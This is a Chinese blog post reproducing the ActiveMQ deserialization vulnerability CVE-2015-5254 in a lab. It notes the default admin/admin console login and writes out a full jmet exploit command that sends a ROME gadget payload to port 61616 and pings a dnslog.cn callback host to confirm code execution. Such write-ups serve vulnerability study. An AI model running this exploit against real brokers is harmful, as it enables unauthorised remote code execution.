温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

发布时间:2021-12-29 17:37:58 来源:亿速云 阅读:308 作者:柒染 栏目:安全技术

本篇文章给大家分享的是有关ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。

下面仅做漏洞复现记录与实现,利用流程如下:

一、漏洞环境信息

目标链接:http://192.168.101.152:8161/

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

访问activemq 查看是否部署成功

http://192.168.101.152:8161/admin/  默认账户密码(admin/admin)

二、漏洞利用

执行命令

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "ping test.z7wb3x.dnslog.cn" -Yp ROME   192.168.101.152   61616

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

此时会给ActiveMQ添加一个事件队列,通过访问

http://192.168.101.152:8161/admin/browse.jsp?JMSDestination=event

可以查看到这个队列

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

点击后执行命令

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的

命令执行成功

以上就是ActiveMQ反序列化漏洞的CVE-2015-5254复现是怎样的,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI